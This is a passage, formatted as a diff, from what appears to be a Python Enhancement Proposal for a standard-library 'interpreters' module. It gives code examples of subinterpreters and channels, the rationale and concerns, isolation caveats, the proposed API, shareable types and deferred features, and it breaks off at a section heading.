+            while c != b'\x00':
+                data += c
+                c = os.read(reader, 1)
+            obj = pickle.loads(data)
+            do_something(obj)
+            c = os.read(reader, 1)
+        """))
+for obj in input:
+    data = pickle.dumps(obj)
+    os.write(s, data)
+    os.write(s, b'\x00')
+os.write(s, b'\x00')
+
+
+
+
+

Capturing an interpreter’s stdout

+
interp = interpreters.create()
+stdout = io.StringIO()
+with contextlib.redirect_stdout(stdout):
+    interp.exec(tw.dedent("""
+        print('spam!')
+        """))
+assert stdout.getvalue() == 'spam!\n'
+
+# alternately:
+interp.exec(tw.dedent("""
+    import contextlib, io
+    stdout = io.StringIO()
+    with contextlib.redirect_stdout(stdout):
+        print('spam!')
+    captured = stdout.getvalue()
+    """))
+captured = interp.get_main_attr('captured')
+assert captured == 'spam!\n'
+
+
+

A pipe (os.pipe()) could be used similarly.

+
+
+

Running a module

+
interp = interpreters.create()
+main_module = mod_name
+interp.exec(f'import runpy; runpy.run_module({main_module!r})')
+
+
+
+
+

Running as script (including zip archives & directories)

+
interp = interpreters.create()
+main_script = path_name
+interp.exec(f"import runpy; runpy.run_path({main_script!r})")
+
+
+
+
+

Using a channel to communicate

+
tasks_recv, tasks = interpreters.create_channel()
+results, results_send = interpreters.create_channel()
+
+def worker():
+    interp = interpreters.create()
+    interp.set_main_attrs(tasks=tasks_recv, results=results_send)
+    interp.exec(tw.dedent("""
+        def handle_request(req):
+            ...
+
+        def capture_exception(exc):
+            ...
+
+        while True:
+            try:
+                req = tasks.recv()
+            except Exception:
+                # channel closed
+                break
+            try:
+                res = handle_request(req)
+            except Exception as exc:
+                res = capture_exception(exc)
+            results.send_nowait(res)
+        """))
+threads = [threading.Thread(target=worker) for _ in range(20)]
+for t in threads:
+    t.start()
+
+requests = ...
+for req in requests:
+    tasks.send(req)
+tasks.close()
+
+for t in threads:
+    t.join()
+
+
+
+
+

Sharing a memoryview (imagine map-reduce)

+
data, chunksize = read_large_data_set()
+buf = memoryview(data)
+numchunks = (len(buf) + chunksize - 1) // chunksize
+results = memoryview(bytearray(numchunks))
+
+tasks_recv, tasks = interpreters.create_channel()
+
+def worker():
+    interp = interpreters.create()
+    interp.set_main_attrs(data=buf, results=results, tasks=tasks_recv)
+    interp.exec(tw.dedent("""
+        while True:
+            try:
+                req = tasks.recv()
+            except Exception:
+                # channel closed
+                break
+            resindex, start, end = req
+            chunk = data[start: end]
+            res = reduce_chunk(chunk)
+            results[resindex] = res
+        """))
+t = threading.Thread(target=worker)
+t.start()
+
+for i in range(numchunks):
+    if not workers_running():
+        raise ...
+    start = i * chunksize
+    end = start + chunksize
+    if end > len(buf):
+        end = len(buf)
+    tasks.send((i, start, end))
+tasks.close()
+t.join()
+
+use_results(results)
+
+
+
+
+
+

Rationale

+

Running code in multiple interpreters provides a useful level of isolation within the same process. This can be leveraged in a number of ways. Furthermore, subinterpreters provide a well-defined framework in which such isolation may be extended. (See PEP 684.)

+

Alyssa (Nick) Coghlan explained some of the benefits through a comparison with +multi-processing [benefits]:

+
[I] expect that communicating between subinterpreters is going
+to end up looking an awful lot like communicating between
+subprocesses via shared memory.
+
+The trade-off between the two models will then be that one still
+just looks like a single process from the point of view of the
+outside world, and hence doesn't place any extra demands on the
+underlying OS beyond those required to run CPython with a single
+interpreter, while the other gives much stricter isolation
+(including isolating C globals in extension modules), but also
+demands much more from the OS when it comes to its IPC
+capabilities.
+
+The security risk profiles of the two approaches will also be quite
+different, since using subinterpreters won't require deliberately
+poking holes in the process isolation that operating systems give
+you by default.
+
+
+

CPython has supported multiple interpreters, with increasing levels +of support, since version 1.5. While the feature has the potential +to be a powerful tool, it has suffered from neglect +because the multiple interpreter capabilities are not readily available +directly from Python. Exposing the existing functionality +in the stdlib will help reverse the situation.

+

This proposal is focused on enabling the fundamental capability of multiple interpreters, isolated from each other, in the same Python process. This is a new area for Python so there is relative uncertainty about the best tools to provide as companions to interpreters. Thus we minimize the functionality we add in the proposal as much as possible.

+
+

Concerns

+
    +
  • “subinterpreters are not worth the trouble”
  • +
+

Some have argued that subinterpreters do not add sufficient benefit +to justify making them an official part of Python. Adding features +to the language (or stdlib) has a cost in increasing the size of +the language. So an addition must pay for itself.

+

In this case, multiple interpreter support provides a novel concurrency model focused on isolated threads of execution. Furthermore, it provides an opportunity for changes in CPython that will allow simultaneous use of multiple CPU cores (currently prevented by the GIL–see PEP 684).

+

Alternatives to subinterpreters include threading, async, and +multiprocessing. Threading is limited by the GIL and async isn’t +the right solution for every problem (nor for every person). +Multiprocessing is likewise valuable in some but not all situations. +Direct IPC (rather than via the multiprocessing module) provides +similar benefits but with the same caveat.

+

Notably, subinterpreters are not intended as a replacement for any of +the above. Certainly they overlap in some areas, but the benefits of +subinterpreters include isolation and (potentially) performance. In +particular, subinterpreters provide a direct route to an alternate +concurrency model (e.g. CSP) which has found success elsewhere and +will appeal to some Python users. That is the core value that the +interpreters module will provide.

+
    +
  • “stdlib support for multiple interpreters adds extra burden +on C extension authors”
  • +
+

In the Interpreter Isolation section below we identify ways in +which isolation in CPython’s subinterpreters is incomplete. Most +notable is extension modules that use C globals to store internal +state. (PEP 3121 and PEP 489 provide a solution to that problem, +followed by some extra APIs that improve efficiency, e.g. PEP 573).

+

Consequently, projects that publish extension modules may face an +increased maintenance burden as their users start using subinterpreters, +where their modules may break. This situation is limited to modules +that use C globals (or use libraries that use C globals) to store +internal state. For numpy, the reported-bug rate is one every 6 +months. [bug-rate]

+

Ultimately this comes down to a question of how often it will be a +problem in practice: how many projects would be affected, how often +their users will be affected, what the additional maintenance burden +will be for projects, and what the overall benefit of subinterpreters +is to offset those costs. The position of this PEP is that the actual +extra maintenance burden will be small and well below the threshold at +which subinterpreters are worth it.

+
    +
  • “creating a new concurrency API deserves much more thought and +experimentation, so the new module shouldn’t go into the stdlib +right away, if ever”
  • +
+

Introducing an API for a new concurrency model, like happened with +asyncio, is an extremely large project that requires a lot of careful +consideration. It is not something that can be done as simply as this +PEP proposes and likely deserves significant time on PyPI to mature. +(See Nathaniel’s post on python-dev.)

+

However, this PEP does not propose any new concurrency API. +At most it exposes minimal tools (e.g. subinterpreters, channels) +which may be used to write code that follows patterns associated with +(relatively) new-to-Python concurrency models. +Those tools could also be used as the basis for APIs for such +concurrency models. Again, this PEP does not propose any such API.

+
    +
  • “there is no point to exposing subinterpreters if they still share +the GIL”
  • +
  • “the effort to make the GIL per-interpreter is disruptive and risky”
  • +
+

A common misconception is that this PEP also includes a promise that +interpreters will no longer share the GIL. When that is clarified, +the next question is “what is the point?”. This is already answered +at length in this PEP. Just to be clear, the value lies in:

+
* increase exposure of the existing feature, which helps improve
+  the code health of the entire CPython runtime
+* expose the (mostly) isolated execution of interpreters
+* preparation for per-interpreter GIL
+* encourage experimentation
+
+
+
    +
  • “data sharing can have a negative impact on cache performance +in multi-core scenarios”
  • +
+

(See [cache-line-ping-pong].)

+

This shouldn’t be a problem for now as we have no immediate plans +to actually share data between interpreters, instead focusing +on copying.

+
+
+
+

About Subinterpreters

+
+

Concurrency

+

Concurrency is a challenging area of software development. Decades of +research and practice have led to a wide variety of concurrency models, +each with different goals. Most center on correctness and usability.

+

One class of concurrency models focuses on isolated threads of +execution that interoperate through some message passing scheme. A +notable example is Communicating Sequential Processes [CSP] (upon +which Go’s concurrency is roughly based). The intended isolation +inherent to CPython’s interpreters makes them well-suited +to this approach.

+
+
+

Shared Data

+

CPython’s interpreters are inherently isolated (with caveats +explained below), in contrast to threads. So the same +communicate-via-shared-memory approach doesn’t work. Without an +alternative, effective use of concurrency via multiple interpreters +is significantly limited.

+

The key challenge here is that sharing objects between interpreters faces complexity due to various constraints on object ownership, visibility, and mutability. At a conceptual level it's easier to reason about concurrency when objects only exist in one interpreter at a time. At a technical level, CPython's current memory model limits how Python objects may be shared safely between interpreters; effectively, objects are bound to the interpreter in which they were created. Furthermore, the complexity of object sharing increases as interpreters become more isolated, e.g. after GIL removal (though this is mitigated somewhat for some "immortal" objects; see PEP 683).

+

Consequently, the mechanism for sharing needs to be carefully considered. +There are a number of valid solutions, several of which may be +appropriate to support in Python’s stdlib and C-API. Any such solution +is likely to share many characteristics with the others.

+

In the meantime, we propose here a minimal solution +(Interpreter.set_main_attrs()), which sets some precedent for how +objects are shared. More importantly, it facilitates the introduction +of more advanced approaches later and allows them to coexist and cooperate. +In part to demonstrate that, we will provide a basic implementation of +“channels”, as a somewhat more advanced sharing solution.

+

Separate proposals may cover:

+
  • the addition of a public C-API based on the implementation of Interpreter.set_main_attrs()
  • the addition of other sharing approaches to the "interpreters" module

The fundamental enabling feature for communication is that most objects +can be converted to some encoding of underlying raw data, which is safe +to be passed between interpreters. For example, an int object can +be turned into a C long value, sent to another interpreter, and +turned back into an int object there. As another example, +None may be passed as-is.
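For illustration only, here is a rough pure-Python analogy of that round-trip (the real conversion happens in C and does not use these methods):

# Interpreter A: extract interpreter-independent raw data from an int
# (the real mechanism uses a C long rather than bytes).
data = (42).to_bytes(8, 'little', signed=True)

# Interpreter B: rebuild an equivalent, but distinct, int object.
value = int.from_bytes(data, 'little', signed=True)
assert value == 42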

+

Regardless, the effort to determine the best way forward here is mostly +outside the scope of this PEP. In the meantime, this proposal describes +a basic interim solution using pipes (os.pipe()), as well as +providing a dedicated capability (“channels”). +See API For Communication below.

+
+
+

Interpreter Isolation

+

CPython’s interpreters are intended to be strictly isolated from each +other. Each interpreter has its own copy of all modules, classes, +functions, and variables. The same applies to state in C, including in +extension modules. The CPython C-API docs explain more. [caveats]

+

However, there are ways in which interpreters do share some state. +First of all, some process-global state remains shared:

+
  • file descriptors
  • low-level env vars
  • process memory (though allocators are isolated)
  • builtin types (e.g. dict, bytes)
  • singletons (e.g. None)
  • underlying static module data (e.g. functions) for builtin/extension/frozen modules

There are no plans to change this.

+

Second, some isolation is faulty due to bugs or implementations that did not take subinterpreters into account. This includes things like extension modules that rely on C globals. [cryptography] In these cases bugs should be opened (some already have been).

+ +

Finally, some potential isolation is missing due to the current design of CPython. Improvements are underway to address gaps in this area:

+
  • extensions using the PyGILState_* API are somewhat incompatible [gilstate]
+
+

Existing Usage

+

Multiple interpreter support has not been a widely used feature. +In fact, there have been only a handful of documented cases of +widespread usage, including +mod_wsgi, +OpenStack Ceph, and +JEP. On the one hand, these cases +provide confidence that existing multiple interpreter support is +relatively stable. On the other hand, there isn’t much of a sample +size from which to judge the utility of the feature.

+
+
+
+

Alternate Python Implementations

+

I’ve solicited feedback from various Python implementors about support +for subinterpreters. Each has indicated that they would be able to +support multiple interpreters in the same process (if they choose to) +without a lot of trouble. Here are the projects I contacted:

+
  • jython ([jython])
  • ironpython (personal correspondence)
  • pypy (personal correspondence)
  • micropython (personal correspondence)
+
+

“interpreters” Module API

+

The module provides the following functions:

+
list_all() -> [Interpreter]
+
+   Return a list of all existing interpreters.
+
+get_current() -> Interpreter
+
+   Return the currently running interpreter.
+
+get_main() -> Interpreter
+
+   Return the main interpreter.  If the Python implementation
+   has no concept of a main interpreter then return None.
+
+create() -> Interpreter
+
+   Initialize a new Python interpreter and return it.
+   It will remain idle until something is run in it and always
+   run in its own thread.
+
+is_shareable(obj) -> bool:
+
+   Return True if the object may be "shared" between interpreters.
+   This does not necessarily mean that the actual objects will be
+   shared.  Instead, it means that the objects' underlying data will
+   be shared in a cross-interpreter way, whether via a proxy, a
+   copy, or some other means.
+
+
+
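For a quick illustration of these functions, here is a minimal sketch (assuming the proposed module is importable as interpreters; comparing Interpreter objects by id is an assumption, since object equality is not specified above):

import interpreters  # the proposed module

main = interpreters.get_main()
interp = interpreters.create()

# The new interpreter shows up in the list of all interpreters.
assert interp.id in {i.id for i in interpreters.list_all()}
# This code is running in the main interpreter.
assert interpreters.get_current().id == main.id

assert interpreters.is_shareable('spam')    # str is in the initial set
assert not interpreters.is_shareable([1])   # list is not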

The module also provides the following class:

+
class Interpreter(id):
+
+   id -> int:
+
+      The interpreter's ID. (read-only)
+
+   is_running() -> bool:
+
+      Return whether or not the interpreter's "exec()" is currently
+      executing code.  Code running in subthreads is ignored.
+      Calling this on the current interpreter will always return True.
+
+   close():
+
+      Finalize and destroy the interpreter.
+
+      This may not be called on an already running interpreter.
+      Doing so results in a RuntimeError.
+
+   set_main_attrs(iterable_or_mapping, /):
+   set_main_attrs(**kwargs):
+
+      Set attributes in the interpreter's __main__ module
+      corresponding to the given name-value pairs.  Each value
+      must be a "shareable" object and will be converted to a new
+      object (e.g. copy, proxy) in whatever way that object's type
+      defines.  If an attribute with the same name is already set,
+      it will be overwritten.
+
+      This method is helpful for setting up an interpreter before
+      calling exec().
+
+   get_main_attr(name, default=None, /):
+
+      Return the value of the corresponding attribute of the
+      interpreter's __main__ module.  If the attribute isn't set
+      then the default is returned.  If it is set, but the value
+      isn't "shareable" then a ValueError is raised.
+
+      This may be used to introspect the __main__ module, as well
+      as a very basic mechanism for "returning" one or more results
+      from Interpreter.exec().
+
+   exec(source_str, /):
+
+      Run the provided Python source code in the interpreter,
+      in its __main__ module.
+
+      This may not be called on an already running interpreter.
+      Doing so results in a RuntimeError.
+
+      An "interp.exec()" call is similar to a builtin exec() call
+      (or to calling a function that returns None).  Once
+      "interp.exec()" completes, the code that called "exec()"
+      continues executing (in the original interpreter).  Likewise,
+      if there is any uncaught exception then it effectively
+      (see below) propagates into the code where ``interp.exec()``
+      was called.  Like exec() (and threads), but unlike function
+      calls, there is no return value.  If any "return" value from
+      the code is needed, send the data out via a pipe (os.pipe())
+      or channel or other cross-interpreter communication mechanism.
+
+      The big difference from exec() or functions is that
+      "interp.exec()" executes the code in an entirely different
+      interpreter, with entirely separate state.  The interpreters
+      are completely isolated from each other, so the state of the
+      original interpreter (including the code it was executing in
+      the current OS thread) does not affect the state of the target
+      interpreter (the one that will execute the code).  Likewise,
+      the target does not affect the original, nor any of its other
+      threads.
+
+      Instead, the state of the original interpreter (for this thread)
+      is frozen, and the code it's executing completely blocks.
+      At that point, the target interpreter is given control of the
+      OS thread.  Then, when it finishes executing, the original
+      interpreter gets control back and continues executing.
+
+      So calling "interp.exec()" will effectively cause the current
+      Python thread to completely pause.  Sometimes you won't want
+      that pause, in which case you should make the "exec()" call in
+      another thread.  To do so, add a function that calls
+      "interp.exec()" and then run that function in a normal
+      "threading.Thread".
+
+      Note that the interpreter's state is never reset, neither
+      before "interp.exec()" executes the code nor after.  Thus the
+      interpreter state is preserved between calls to
+      "interp.exec()".  This includes "sys.modules", the "builtins"
+      module, and the internal state of C extension modules.
+
+      Also note that "interp.exec()" executes in the namespace of the
+      "__main__" module, just like scripts, the REPL, "-m", and
+      "-c".  Just as the interpreter's state is not ever reset, the
+      "__main__" module is never reset.  You can imagine
+      concatenating the code from each "interp.exec()" call into one
+      long script.  This is the same as how the REPL operates.
+
+      Supported code: source text.
+
+
+
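Here is a minimal sketch of the class in use (same assumptions as above; note that exec() blocks the calling thread until the code finishes):

import textwrap
import interpreters  # the proposed module

interp = interpreters.create()

# Set up the subinterpreter's __main__ before running any code in it.
interp.set_main_attrs(who='world')

# Runs in the subinterpreter's __main__ module, blocking this thread.
interp.exec(textwrap.dedent("""
    greeting = 'hello, ' + who
    """))

# A very basic way of "returning" a result from the subinterpreter.
assert interp.get_main_attr('greeting') == 'hello, world'

interp.close()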

In addition to the functionality of Interpreter.set_main_attrs(), +the module provides a related way to pass data between interpreters: +channels. See Channels below.

+
+

Uncaught Exceptions

+

Regarding uncaught exceptions in Interpreter.exec(), we noted that +they are “effectively” propagated into the code where interp.exec() +was called. To prevent leaking exceptions (and tracebacks) between +interpreters, we create a surrogate of the exception and its traceback +(see traceback.TracebackException), set it to __cause__ +on a new interpreters.RunFailedError, and raise that.

+

Directly raising (a proxy of) the exception is problematic since it’s +harder to distinguish between an error in the interp.exec() call +and an uncaught exception from the subinterpreter.
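Concretely, callers only ever need to handle one exception type; a minimal sketch:

import interpreters  # the proposed module

interp = interpreters.create()
try:
    interp.exec('1/0')
except interpreters.RunFailedError as exc:
    # exc.__cause__ is the surrogate, not the original exception
    # object, built from a traceback.TracebackException-style snapshot.
    print('uncaught in subinterpreter:', exc.__cause__)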

+
+
+
+

Interpreter Restrictions

+

Every new interpreter created by interpreters.create() +now has specific restrictions on any code it runs. This includes the +following:

+
  • importing an extension module fails if it does not implement multi-phase init
  • daemon threads may not be created
  • os.fork() is not allowed (so no multiprocessing)
  • os.exec*() is not allowed (but "fork+exec", a la subprocess, is okay)

Note that interpreters created with the existing C-API do not have these +restrictions. The same is true for the “main” interpreter, so +existing use of Python will not change.

+

We may choose to later loosen some of the above restrictions or provide +a way to enable/disable granular restrictions individually. Regardless, +requiring multi-phase init from extension modules will always be a +default restriction.

+
+
+

API For Communication

+

As discussed in Shared Data above, multiple interpreter support +is less useful without a mechanism for sharing data (communicating) +between them. Sharing actual Python objects between interpreters, +however, has enough potential problems that we are avoiding support +for that in this proposal. Nor, as mentioned earlier, are we adding +anything more than a basic mechanism for communication.

+

That mechanism is the Interpreter.set_main_attrs() method. +It may be used to set up global variables before Interpreter.exec() +is called. The name-value pairs passed to set_main_attrs() are +bound as attributes of the interpreter’s __main__ module. +The values must be “shareable”. See Shareable Types below.

+

Additional approaches to communicating and sharing objects are enabled +through Interpreter.set_main_attrs(). A shareable object could be +implemented which works like a queue, but with cross-interpreter safety. +In fact, this PEP does include an example of such an approach: channels.

+
+

Shareable Types

+

An object is "shareable" if its type supports shareable instances. The type must implement a new internal protocol, which is used to convert an object to interpreter-independent data that is then converted back to an object on the other side. Also see is_shareable() above.

+

A minimal set of simple, immutable builtin types will be supported +initially, including:

+
  • None
  • bool
  • bytes
  • str
  • int
  • float

We will also support a small number of complex types initially:

  • memoryview (to allow sharing PEP 3118 buffers; see SendChannel.send() below)
  • channels (see Channels below)

Further builtin types may be supported later, complex or not. +Limiting the initial shareable types is a practical matter, reducing +the potential complexity of the initial implementation. There are a +number of strategies we may pursue in the future to expand supported +objects, once we have more experience with interpreter isolation.

+

In the meantime, a separate proposal will discuss making the internal +protocol (and C-API) used by Interpreter.set_main_attrs() public. +With that protocol, support for other types could be added +by extension modules.

+
+

Communicating Through OS Pipes

+

Even without a dedicated object for communication, users may already +use existing tools. For example, one basic approach for sending data +between interpreters is to use a pipe (see os.pipe()):

+
  1. interpreter A calls os.pipe() to get a read/write pair of file descriptors (both int objects)
  2. interpreter A calls interp.set_main_attrs(), binding the read FD (or embeds it using string formatting)
  3. interpreter A calls interp.exec() on interpreter B
  4. interpreter A writes some bytes to the write FD
  5. interpreter B reads those bytes
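A sketch of those five steps (assuming the proposed module is importable as interpreters; the thread is needed because interp.exec() blocks the calling thread):

import os
import textwrap
import threading
import interpreters  # the proposed module

interp = interpreters.create()              # interpreter B
r, w = os.pipe()                            # step 1

interp.set_main_attrs(fd=r)                 # step 2: bind the read FD

code = textwrap.dedent("""
    import os
    data = os.read(fd, 4)                   # step 5: read the bytes
    assert data == b'spam'
    """)

# Step 3: run the code in interpreter B, in a separate thread so
# that step 4 can happen concurrently.
t = threading.Thread(target=interp.exec, args=(code,))
t.start()

os.write(w, b'spam')                        # step 4: write some bytes
t.join()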

Several of the earlier examples demonstrate this, such as +Synchronize using an OS pipe.

+
+
+
+

Channels

+

The interpreters module will include a dedicated solution for +passing object data between interpreters: channels. They are included +in the module in part to provide an easier mechanism than using +os.pipe() and in part to demonstrate how libraries may take +advantage of Interpreter.set_main_attrs() +and the protocol it uses.

+

A channel is a simplex FIFO. It is a basic, opt-in data sharing +mechanism that draws inspiration from pipes, queues, and CSP’s +channels. [fifo] The main difference from pipes is that channels can +be associated with zero or more interpreters on either end. Like +queues, which are also many-to-many, channels are buffered (though +they also offer methods with unbuffered semantics).

+

Channels have two operations: send and receive. A key characteristic +of those operations is that channels transmit data derived from Python +objects rather than the objects themselves. When objects are sent, +their data is extracted. When the “object” is received in the other +interpreter, the data is converted back into an object owned by that +interpreter.

+

To make this work, the mutable shared state will be managed by the Python runtime, not by any of the interpreters. Initially we will support only one type of object for shared state: the channels provided by interpreters.create_channel(). Channels, in turn, will carefully manage passing objects between interpreters.

+

This approach, including keeping the API minimal, helps us avoid further +exposing any underlying complexity to Python users.

+

The interpreters module provides the following function related +to channels:

+
create_channel() -> (RecvChannel, SendChannel):
+
+   Create a new channel and return (recv, send), the RecvChannel
+   and SendChannel corresponding to the ends of the channel.
+
+   Both ends of the channel are supported "shared" objects (i.e.
+   may be safely shared by different interpreters).  Thus they
+   may be set using "Interpreter.set_main_attrs()".
+
+
+

The module also provides the following channel-related classes:

+
class RecvChannel(id):
+
+   The receiving end of a channel.  An interpreter may use this to
+   receive objects from another interpreter.  Any type supported by
+   Interpreter.set_main_attrs() will be supported here, though at
+   first only a few of the simple, immutable builtin types
+   will be supported.
+
+   id -> int:
+
+      The channel's unique ID.  The "send" end has the same one.
+
+   recv(*, timeout=None):
+
+      Return the next object from the channel.  If none have been
+      sent then wait until the next send (or until the timeout is hit).
+
+      At the least, the object will be equivalent to the sent object.
+      That will almost always mean the same type with the same data,
+      though it could also be a compatible proxy.  Regardless, it may
+      use a copy of that data or actually share the data.  That's up
+      to the object's type.
+
+   recv_nowait(default=None):
+
+      Return the next object from the channel.  If none have been
+      sent then return the default.  Otherwise, this is the same
+      as the "recv()" method.
+
+
+class SendChannel(id):
+
+   The sending end of a channel.  An interpreter may use this to
+   send objects to another interpreter.  Any type supported by
+   Interpreter.set_main_attrs() will be supported here, though
+   at first only a few of the simple, immutable builtin types
+   will be supported.
+
+   id -> int:
+
+      The channel's unique ID.  The "recv" end has the same one.
+
+   send(obj, *, timeout=None):
+
+      Send the object (i.e. its data) to the "recv" end of the
+      channel.  Wait until the object is received.  If the object
+      is not shareable then ValueError is raised.
+
+      The builtin memoryview is supported, so sending a buffer
+      across involves first wrapping the object in a memoryview
+      and then sending that.
+
+   send_nowait(obj):
+
+      Send the object to the "recv" end of the channel.  This
+      behaves the same as "send()", except for the waiting part.
+      If no interpreter is currently receiving (waiting on the
+      other end) then queue the object and return False.  Otherwise
+      return True.
+
+
+
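A minimal sketch of a channel round-trip, under the same assumptions as the earlier examples:

import textwrap
import threading
import interpreters  # the proposed module

interp = interpreters.create()
rch, sch = interpreters.create_channel()

# Channel ends are shareable, so they may be bound via set_main_attrs().
interp.set_main_attrs(sch=sch)

code = textwrap.dedent("""
    sch.send('spam')          # blocks until the object is received
    """)
t = threading.Thread(target=interp.exec, args=(code,))
t.start()

obj = rch.recv()              # blocks until the subinterpreter sends
assert obj == 'spam'
t.join()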
+
+

Caveats For Shared Objects

+

Again, Python objects are not shared between interpreters. +However, in some cases data those objects wrap is actually shared +and not just copied. One example might be PEP 3118 buffers.

+

In those cases the object in the original interpreter is kept alive +until the shared data in the other interpreter is no longer used. +Then object destruction can happen like normal in the original +interpreter, along with the previously shared data.

+
+
+
+

Documentation

+

The new stdlib docs page for the interpreters module will include +the following:

+
  • (at the top) a clear note that support for multiple interpreters is not required from extension modules
  • some explanation about what subinterpreters are
  • brief examples of how to use multiple interpreters (and communicating between them)
  • a summary of the limitations of using multiple interpreters
  • (for extension maintainers) a link to the resources for ensuring multiple interpreters compatibility
  • much of the API information in this PEP

Docs about resources for extension maintainers already exist on the +Isolating Extension Modules howto page. Any +extra help will be added there. For example, it may prove helpful +to discuss strategies for dealing with linked libraries that keep +their own subinterpreter-incompatible global state.

+

Note that the documentation will play a large part in mitigating any +negative impact that the new interpreters module might have on +extension module maintainers.

+

Also, the ImportError for incompatible extension modules will be +updated to clearly say it is due to missing multiple interpreters +compatibility and that extensions are not required to provide it. This +will help set user expectations properly.

+
+
+

Alternative Solutions

+

One possible alternative to a new module is to add support for interpreters +to concurrent.futures. There are several reasons why that wouldn’t work:

+
  • the obvious place to look for multiple interpreters support is an "interpreters" module, much as with "threading", etc.
  • concurrent.futures is all about executing functions but currently we don't have a good way to run a function from one interpreter in another

Similar reasoning applies for support in the multiprocessing module.

+
+
+

Open Questions

+
  • will it be too confusing that interp.exec() runs in the current thread?
  • should we add pickling fallbacks right now for interp.exec(), and/or Interpreter.set_main_attrs() and Interpreter.get_main_attr()?
  • should we support (limited) functions in interp.exec() right now?
  • rename Interpreter.close() to Interpreter.destroy()?
  • drop Interpreter.get_main_attr(), since we have channels?
  • should channels be their own PEP?
+
+

Deferred Functionality

+

In the interest of keeping this proposal minimal, the following functionality has been left out for future consideration. Note that this is not a judgement against any of these capabilities, but rather a deferment. That said, each is arguably valid.

+
+

Add convenience API

+

There are a number of things I can imagine would smooth out +hypothetical rough edges with the new module:

+
  • add something like Interpreter.run() or Interpreter.call() that calls interp.exec() and falls back to pickle
  • fall back to pickle in Interpreter.set_main_attrs() and Interpreter.get_main_attr()

These would be easy to do if this proves to be a pain point.

+
+
+

Avoid possible confusion about interpreters running in the current thread

+

One regular point of confusion has been that Interpreter.exec() +executes in the current OS thread, temporarily blocking the current +Python thread. It may be worth doing something to avoid that confusion.

+

Some possible solutions for this hypothetical problem:

+
  • by default, run in a new thread?
  • add Interpreter.exec_in_thread()?
  • add Interpreter.exec_in_current_thread()?

In earlier versions of this PEP the method was interp.run(). The simple change to interp.exec() alone will probably reduce confusion sufficiently, when coupled with educating users via the docs. If it turns out to be a real problem, we can pursue one of the alternatives at that point.

+
+
+

Clarify “running” vs. “has threads”

+

Interpreter.is_running() refers specifically to whether or not +Interpreter.exec() (or similar) is running somewhere. It does not +say anything about if the interpreter has any subthreads running. That +information might be helpful.

+

Some things we could do:

+
  • rename Interpreter.is_running() to Interpreter.is_running_main()
  • add Interpreter.has_threads(), to complement Interpreter.is_running()
  • expand to Interpreter.is_running(main=True, threads=False)

None of these are urgent and any could be done later, if desired.

+
+
+

A Dunder Method For Sharing

+

We could add a special method, like __xid__, to correspond to tp_xid. At the very least, it would allow Python types to convert their instances to some other type that implements tp_xid.

+

The problem is that exposing this capability to Python code presents a degree of complexity that hasn't been explored yet, nor is there a compelling case to investigate that complexity.

+
+
+

Interpreter.call()

+

It would be convenient to run existing functions in subinterpreters +directly. Interpreter.exec() could be adjusted to support this or +a call() method could be added:

+
Interpreter.call(f, *args, **kwargs)
+
+
+

This suffers from the same problem as sharing objects between +interpreters via queues. The minimal solution (running a source string) +is sufficient for us to get the feature out where it can be explored.

+
+
+

Interpreter.run_in_thread()

+

This method would make an interp.exec() call for you in a thread. Doing this using only threading.Thread and interp.exec() is relatively trivial, so we've left it out.

+
+
+

Synchronization Primitives

+

The threading module provides a number of synchronization primitives +for coordinating concurrent operations. This is especially necessary +due to the shared-state nature of threading. In contrast, +interpreters do not share state. Data sharing is restricted to the +runtime’s shareable objects capability, which does away with the need +for explicit synchronization. If any sort of opt-in shared state +support is added to CPython’s interpreters in the future, that same +effort can introduce synchronization primitives to meet that need.

+
+
+

CSP Library

+

A csp module would not be a large step away from the functionality +provided by this PEP. However, adding such a module is outside the +minimalist goals of this proposal.

+
+
+

Syntactic Support

+

The Go language provides a concurrency model based on CSP, +so it’s similar to the concurrency model that multiple interpreters +support. However, Go also provides syntactic support, as well as +several builtin concurrency primitives, to make concurrency a +first-class feature. Conceivably, similar syntactic (and builtin) +support could be added to Python using interpreters. However, +that is way outside the scope of this PEP!

+
+
+

Multiprocessing

+

The multiprocessing module could support interpreters in the same +way it supports threads and processes. In fact, the module’s +maintainer, Davin Potts, has indicated this is a reasonable feature +request. However, it is outside the narrow scope of this PEP.

+
+
+

C-extension opt-in/opt-out

+

By using the PyModuleDef_Slot introduced by PEP 489, we could +easily add a mechanism by which C-extension modules could opt out of +multiple interpreter support. Then the import machinery, when operating +in a subinterpreter, would need to check the module for support. +It would raise an ImportError if unsupported.

+

Alternately we could support opting in to multiple interpreters support. +However, that would probably exclude many more modules (unnecessarily) +than the opt-out approach. Also, note that PEP 489 defined that an +extension’s use of the PEP’s machinery implies multiple interpreters +support.

+

The scope of adding the ModuleDef slot and fixing up the import +machinery is non-trivial, but could be worth it. It all depends on +how many extension modules break under subinterpreters. Given that +there are relatively few cases we know of through mod_wsgi, we can +leave this for later.

+
+
+

Poisoning channels

+

CSP has the concept of poisoning a channel. Once a channel has been +poisoned, any send() or recv() call on it would raise a special +exception, effectively ending execution in the interpreter that tried +to use the poisoned channel.

+

This could be accomplished by adding a poison() method to both ends +of the channel. The close() method can be used in this way +(mostly), but these semantics are relatively specialized and can wait.

+
+
+

Resetting __main__

+

As proposed, every call to Interpreter.exec() will execute in the +namespace of the interpreter’s existing __main__ module. This means +that data persists there between interp.exec() calls. Sometimes +this isn’t desirable and you want to execute in a fresh __main__. +Also, you don’t necessarily want to leak objects there that you aren’t +using any more.

+

Note that the following won't work right because it will clear too much (e.g. __name__ and the other "__dunder__" attributes):

+
interp.exec('globals().clear()')
+
+
+
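In the meantime, a manual workaround is possible; here is a sketch that clears only the non-dunder names (using an interp object as in the earlier examples):

# Clear every non-dunder name from the subinterpreter's __main__,
# leaving __name__ and friends intact.  (The comprehension variable
# does not leak into the module's globals in Python 3.)
interp.exec(
    "list(map(globals().pop,"
    " [name for name in globals() if not name.startswith('__')]))"
)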

Possible solutions include:

+
  • a create() arg to indicate resetting __main__ after each interp.exec() call
  • an Interpreter.reset_main flag to support opting in or out after the fact
  • an Interpreter.reset_main() method to opt in when desired
  • importlib.util.reset_globals() [reset_globals]

Also note that resetting __main__ does nothing about state stored +in other modules. So any solution would have to be clear about the +scope of what is being reset. Conceivably we could invent a mechanism +by which any (or every) module could be reset, unlike reload() +which does not clear the module before loading into it.

+

Regardless, since __main__ is the execution namespace of the +interpreter, resetting it has a much more direct correlation to +interpreters and their dynamic state than does resetting other modules. +So a more generic module reset mechanism may prove unnecessary.

+

This isn’t a critical feature initially. It can wait until later +if desirable.

+
+
+

Resetting an interpreter’s state

+

